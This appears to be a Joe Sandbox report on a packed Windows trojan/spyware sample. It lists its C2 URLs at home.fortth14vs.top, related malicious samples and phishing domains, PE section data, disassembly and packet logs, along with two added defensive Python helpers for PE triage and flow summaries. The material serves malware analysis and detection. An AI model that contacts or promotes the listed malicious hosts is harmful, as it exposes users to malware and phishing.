http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1 | ZN34wF8WI2.exe, 00000005.00000002.1416710655.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000003.1395528056.00000000019C7000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://html4/loose.dtd | ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | ZN34wF8WI2.exe | false | | high
https://httpbin.org/ipbefore | ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html | ZN34wF8WI2.exe, ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/hsts.html# | ZN34wF8WI2.exe | false | | high
http://home.fortth14vs.top/gduZ | ZN34wF8WI2.exe, 00000005.00000003.1394903835.0000000001A36000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://.css | ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://.jpg | ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | | high
IPs contacted (IP | Domain | Country | ASN | ASN Name | Malicious). The only non-infrastructure contact is the C2 host home.fortth14vs.top, reached over plain HTTP on port 80 (see the TCP traffic line above).

91.149.241.220 | home.fortth14vs.top | Poland (PL) | 41952 | MARTON-AS | false
34.197.122.172 | httpbin.org | United States (US) | 14618 | AMAZON-AES | false
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1582693
                          Start date and time:2024-12-31 09:43:09 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 9s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:ZN34wF8WI2.exe
                          renamed because original name is a hash value
                          Original Sample Name:e08249e8fc2ed51351908219f021fb0e.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@1/0@9/2
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 51%
                          • Number of executed functions: 31
                          • Number of non-executed functions: 52
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                          • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
34.197.122.172 | Set-up.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | Set-up.exe | malicious | Unknown | 52.202.253.164
httpbin.org | Set-up.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Set-up.exe | malicious | Unknown | 52.73.63.247
httpbin.org | a2mNMrPxow.exe | malicious | Unknown | 3.218.7.103
httpbin.org | SgMuuLxOCJ.exe | malicious | LummaC | 34.226.108.155
httpbin.org | TNyOrM6mIM.exe | malicious | LummaC | 3.218.7.103
httpbin.org | FIyDwZM4OR.exe | malicious | Unknown | 3.218.7.103
httpbin.org | ZFttiy4Tt8.exe | malicious | Unknown | 3.218.7.103
httpbin.org | e62iSl0abZ.exe | malicious | Unknown | 3.218.7.103
httpbin.org | HGFSqmKwd5.exe | malicious | Unknown | 34.226.108.155
Match | Associated Sample Name / URL | Detection | Threat Name | Context
MARTON-ASPL | mips.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | ppc.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | mpsl.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | arm5.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | arm7.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | harm4.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | harm5.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | harm4.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | nshsh4.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | nsharm5.elf | malicious | Unknown | 91.149.238.18
AMAZON-AESUS | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 44.221.84.105
AMAZON-AESUS | http://ghostbin.cafe24.com/ | malicious | Unknown | 44.199.56.69
AMAZON-AESUS | Set-up.exe | malicious | Unknown | 52.202.253.164
AMAZON-AESUS | kwari.mips.elf | malicious | Unknown | 54.226.65.111
AMAZON-AESUS | Set-up.exe | malicious | Unknown | 34.197.122.172
AMAZON-AESUS | https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188 | malicious | KnowBe4 | 3.88.121.169
AMAZON-AESUS | https://chase.com-onlinebanking.com/XWmJkMGsxak5lZzdVZUczR3RxTGFWN1g0Q2NKLy96RURPVEpZbEdkOC9nQzY1TStZSjU0T0x4Q05qOXZBRHZnZTZpMmh2eGFmSm9rcVRmV2xBeENiMEF1V3VTOVAvL2dKemVQZkZGNHAxQ1hqTU9WY0R5SGpYeDQ3UVNtNGZpWDJYdWxBUFY5OUFVc3VFU041aHl6aUxrMlBZaGs1Y25BV0xHL1Vhc1BYNVQ5d3laZ2piV3gvTjlUMmc3QWV4QUs2Q0h6Yi0tZ1lEV1pac1JHRzl5ZFpFaC0tcVVpc09xQzZsUzY0bzY0YWpuS1N2Zz09?cid=2342337857 | malicious | KnowBe4 | 3.88.121.169
AMAZON-AESUS | securedoc_20241220T111852.html | malicious | Unknown | 44.219.110.92
AMAZON-AESUS | https://visa-pwr.com/ | malicious | Unknown | 3.208.228.173
AMAZON-AESUS | botx.mips.elf | malicious | Mirai | 52.0.196.218
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                            Entropy (8bit):7.986074258037828
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • VXD Driver (31/22) 0.00%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:ZN34wF8WI2.exe
                            File size:4'464'640 bytes
                            MD5:e08249e8fc2ed51351908219f021fb0e
                            SHA1:c8e88594280d1f80feccc811bed7ce03eda5286b
                            SHA256:36203748faebc1b01f1450c5b93bd31d21b9f98d1e5df663f8a5451c4553dc71
                            SHA512:d0176fb22ee4b264d12e271a90cc5aff9eb1727dc6e3bb49c58a2cd9089ef820b8722d1e98851f4a8cbf60319a109cb5a8e01215a67b9015eaa7db017b9aaecb
                            SSDEEP:98304:5mSFzucnvyDVgsQ6eYk4T/sZ8qcOhdbWwI1l7JusApT1A4:YSFz7n6pgke+T0Z8neBI1XuNxA
                            TLSH:682633614DB9EA44C9DDADB2D42B434B52AC7B533FC18AF9ED0A86B148E7305D81A1F0
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2...@........M...@..........................p........D...@... ............................
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0x1094000
                            Entrypoint Section:.taggant
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                            DLL Characteristics:DYNAMIC_BASE
                            Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Signature Valid:
                            Signature Issuer:
                            Signature Validation Error:
                            Error Number:
                            Not Before, Not After
                              Subject Chain
                                Version:
                                Thumbprint MD5:
                                Thumbprint SHA-1:
                                Thumbprint SHA-256:
                                Serial:
                                Instruction
                                jmp 00007F7621184D2Ah
                                paddd mm0, qword ptr [ebx+00h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                jmp 00007F7621186D25h
                                add byte ptr [edx+ecx], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74c05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x74b000 | 0x2b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x778200 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc9218c | 0x10 | aapkfxsh
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc9213c | 0x18 | aapkfxsh
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unprintable name) | 0x1000 | 0x74a000 | 0x289000 | 4132eef566095335e7d533986236b1a4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x74b000 | 0x2b0 | 0x200 | fbf6fe89e64c21304118a948f5956ceb | False | 0.802734375 | data | 6.0138918115720985 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x74c000 | 0x1000 | 0x200 | 52564c2cea63394dbc4e71775ebabcc0 | False | 0.166015625 | data | 1.1589685166080708 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unprintable name) | 0x74d000 | 0x390000 | 0x200 | 19ccc0bb8b28f79a0df3115bc41d11b0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
aapkfxsh | 0xadd000 | 0x1b6000 | 0x1b5400 | d511a8ecf937bd6f380fb63a80591e21 | False | 0.9946660368424814 | data | 7.956229076953652 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ucrzewim | 0xc93000 | 0x1000 | 0x400 | afdf469fac5895a9a7881d4d9e80d19b | False | 0.8115234375 | data | 6.316084893218518 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc94000 | 0x3000 | 0x2200 | 1aff23d79b15f2d6dabf881ed68f25e9 | False | 0.057904411764705885 | DOS executable (COM) | 0.7898215980504367 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
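The section table above carries the static signals a triage pipeline keys on: two sections whose names do not print, two with random-looking names (aapkfxsh, ucrzewim), every executable section also writable, an entropy of 7.96 on the largest one, and an entry point (0xc94000) that lands in .taggant rather than a code section. The script below is an added example, not code from the Joe Sandbox report, that derives those same findings from raw bytes with the standard library only. It analyses a three-section PE32 constructed inline (it is not the submitted sample); the "standard" name list, the printable-name test and the 7.0 bits/byte entropy threshold are this example's own choices.

```python
"""Static PE section triage (added example, not the sandbox's own code).
Walks DOS header -> PE header -> section table of a PE32 image and flags the
properties the report keys on: odd names, RWX sections, entropy, entry-point
location. Standard library only; the image it analyses is constructed inline."""
import math
import random
import struct

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
# Names ordinary linkers emit; anything else counts as non-standard here (assumption).
STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".didat"}
HIGH_ENTROPY = 7.0  # bits/byte; packed or encrypted data sits near 8.0 (threshold is an assumption)


def shannon_entropy(data):
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(pe):
    """Minimal PE32 header walk; returns (AddressOfEntryPoint, list of section dicts)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20                                       # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections = []
    for i in range(num_sections):
        off = opt + size_opt + i * 40                     # IMAGE_SECTION_HEADER
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        chars = struct.unpack_from("<I", pe, off + 36)[0]
        sections.append({"name": name.rstrip(b"\0"), "va": va, "vsize": vsize,
                         "raw": pe[raw_ptr:raw_ptr + raw_size], "chars": chars})
    return entry_rva, sections


def triage(pe):
    """Per-section findings; flags are appended in the order name, permissions, entropy, entry."""
    entry_rva, sections = parse_pe(pe)
    findings = []
    for s in sections:
        name = s["name"]
        printable = all(0x20 < b < 0x7F for b in name)
        flags = []
        if not name or not printable:          # blank or unprintable, like the table's unnamed rows
            flags.append("special-chars-name")
        elif name.decode() not in STANDARD_NAMES:
            flags.append("non-standard-name")
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            flags.append("rwx")
        entropy = shannon_entropy(s["raw"])
        if entropy > HIGH_ENTROPY:
            flags.append("high-entropy")
        holds_ep = s["va"] <= entry_rva < s["va"] + max(s["vsize"], len(s["raw"]))
        if holds_ep and name != b".text":
            flags.append("entry-point-outside-.text")
        findings.append({"name": name, "entropy": round(entropy, 3),
                         "entry": holds_ep, "flags": flags})
    return findings


def build_sample_pe():
    """Constructed PE32 (not the analysed sample): a plain .text, an RWX high-entropy
    blob named like the report's aapkfxsh, and an unprintably named RWX section
    that owns the entry point. Each body is one 4 KiB page."""
    rng = random.Random(1582693)
    rwx = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    spec = [
        (b".text", bytes(range(16)) * 256, IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
        (b"aapkfxsh", bytes(rng.getrandbits(8) for _ in range(4096)), rwx),
        (b"\x01\x02\x03", b"\xe9" + b"\0" * 4095, rwx),
    ]
    e_lfanew, size_opt, first_raw = 0x40, 0xE0, 0x400
    headers, bodies, vas = [], [], []
    raw_ptr, va = first_raw, 0x1000
    for name, body, chars in spec:
        vas.append(va)
        headers.append(struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"), len(body), va,
                                   len(body), raw_ptr, 0, 0, 0, 0, chars))
        bodies.append(body)
        raw_ptr += len(body)
        va += 0x1000
    entry_rva = vas[2]                                   # entry point in the oddly named section
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(spec), 0, 0, 0, size_opt, 0x0102)
    opt = struct.pack("<HBBIIII", 0x10B, 14, 0, 4096, 8192, 0, entry_rva)
    opt += b"\0" * (size_opt - len(opt))
    image = dos + b"PE\0\0" + coff + opt + b"".join(headers)
    return image + b"\0" * (first_raw - len(image)) + b"".join(bodies)


if __name__ == "__main__":
    for f in triage(build_sample_pe()):
        print(f"{f['name']!r:16} entropy={f['entropy']:<6} entry={f['entry']!s:5} {f['flags']}")
```

Point `parse_pe` at `open(path, "rb").read()` to run it on a real file. It deliberately ignores the optional header's data directories, so an image whose section table is intact but whose imports are resolved at run time (the report lists a single `lstrcpy` import) still gets a useful per-section verdict.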
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc9219c | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
DLL | Import
kernel32.dll | lstrcpy
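The packet list that follows is one row per packet, which hides the shape of the traffic: one TLS session to httpbin.org and, a few seconds later, a plain port-80 conversation with home.fortth14vs.top. The helper below is an added example, not part of the Joe Sandbox report, that folds rows of that shape into per-connection summaries. Its input is a constructed subset of the report's rows and the IP-to-domain map from the IP table above; the rule that the side using a port in the Windows dynamic range (49152 and up) is the client is this example's assumption.

```python
"""Per-connection summary of a packet list in the report's row shape
(added example, not part of the sandbox report). Standard library only."""
from datetime import datetime, timedelta

EPHEMERAL_START = 49152  # Windows dynamic port range; used to guess which side is the client (assumption)

# Constructed subset of the report's packet rows: (timestamp, src port, dst port, src IP, dst IP).
SAMPLE_ROWS = [
    ("Dec 31, 2024 09:44:09.794188023 CET", 49704, 443, "192.168.2.7", "34.197.122.172"),
    ("Dec 31, 2024 09:44:09.794224977 CET", 443, 49704, "34.197.122.172", "192.168.2.7"),
    ("Dec 31, 2024 09:44:10.613198996 CET", 443, 49704, "34.197.122.172", "192.168.2.7"),
    ("Dec 31, 2024 09:44:13.543690920 CET", 49705, 80, "192.168.2.7", "91.149.241.220"),
    ("Dec 31, 2024 09:44:13.548599958 CET", 80, 49705, "91.149.241.220", "192.168.2.7"),
    ("Dec 31, 2024 09:44:13.549916983 CET", 49705, 80, "192.168.2.7", "91.149.241.220"),
    ("Dec 31, 2024 09:44:14.062356949 CET", 80, 49705, "91.149.241.220", "192.168.2.7"),
]
# IP -> domain as given in the report's IP table.
RESOLVED = {"34.197.122.172": "httpbin.org", "91.149.241.220": "home.fortth14vs.top"}


def parse_ts(s):
    """'Dec 31, 2024 09:44:09.794188023 CET' -> naive datetime; nanoseconds truncated to microseconds."""
    main, frac = s.rsplit(" ", 1)[0].rsplit(".", 1)
    return datetime.strptime(main, "%b %d, %Y %H:%M:%S") + timedelta(microseconds=int(frac[:6]))


def summarize_flows(rows, resolved):
    """Group packets into (client, server) flows; returns summaries ordered by first packet."""
    flows = {}
    for ts, sport, dport, sip, dip in rows:
        # The ephemeral-port side is taken to be the client; the other side is the server.
        if sport >= EPHEMERAL_START and dport < EPHEMERAL_START:
            key, outbound = (sip, sport, dip, dport), True
        else:
            key, outbound = (dip, dport, sip, sport), False
        t = parse_ts(ts)
        f = flows.setdefault(key, {"first": t, "last": t, "out": 0, "in": 0})
        f["first"] = min(f["first"], t)
        f["last"] = max(f["last"], t)
        f["out" if outbound else "in"] += 1
    summary = []
    for (cip, cport, sip, sport), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        summary.append({
            "client": f"{cip}:{cport}",
            "server": f"{sip}:{sport}",
            "domain": resolved.get(sip, "?"),
            "port80": sport == 80,                      # cleartext HTTP by convention
            "first_seen": f["first"].isoformat(timespec="milliseconds"),
            "duration_s": round((f["last"] - f["first"]).total_seconds(), 3),
            "packets_out": f["out"],
            "packets_in": f["in"],
        })
    return summary


if __name__ == "__main__":
    for flow in summarize_flows(SAMPLE_ROWS, RESOLVED):
        print(flow)
```

Feed it the full table (or a PCAP walked with a packet library of your choice) and the output is a flow list you can hand to a network analyst, with each server already labelled by the domain the report resolved for it. The direction guess fails for server-to-server traffic where both ports are below 49152; for a sandbox host talking out from dynamic ports, as here, it holds.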
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 09:44:09.794188023 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:09.794224977 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:09.794470072 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:09.808217049 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:09.808228970 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:10.462610960 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:10.474524021 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:10.474549055 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:10.476196051 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:10.476253033 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:10.498524904 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:10.498614073 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:10.498732090 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:10.498739958 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:10.544048071 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:10.602123022 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:10.602255106 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:10.602313042 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:10.613176107 CET | 49704 | 443 | 192.168.2.7 | 34.197.122.172
Dec 31, 2024 09:44:10.613198996 CET | 443 | 49704 | 34.197.122.172 | 192.168.2.7
Dec 31, 2024 09:44:13.543690920 CET | 49705 | 80 | 192.168.2.7 | 91.149.241.220
Dec 31, 2024 09:44:13.548599958 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.548707008 CET | 49705 | 80 | 192.168.2.7 | 91.149.241.220
Dec 31, 2024 09:44:13.549916983 CET | 49705 | 80 | 192.168.2.7 | 91.149.241.220
Dec 31, 2024 09:44:13.555022955 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555036068 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555044889 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555053949 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555063963 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555073023 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555082083 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555088997 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555097103 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555102110 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
Dec 31, 2024 09:44:13.555141926 CET | 49705 | 80 | 192.168.2.7 | 91.149.241.220
Dec 31, 2024 09:44:13.555217981 CET | 49705 | 80 | 192.168.2.7 | 91.149.241.220
Dec 31, 2024 09:44:13.560059071 CET | 80 | 49705 | 91.149.241.220 | 192.168.2.7
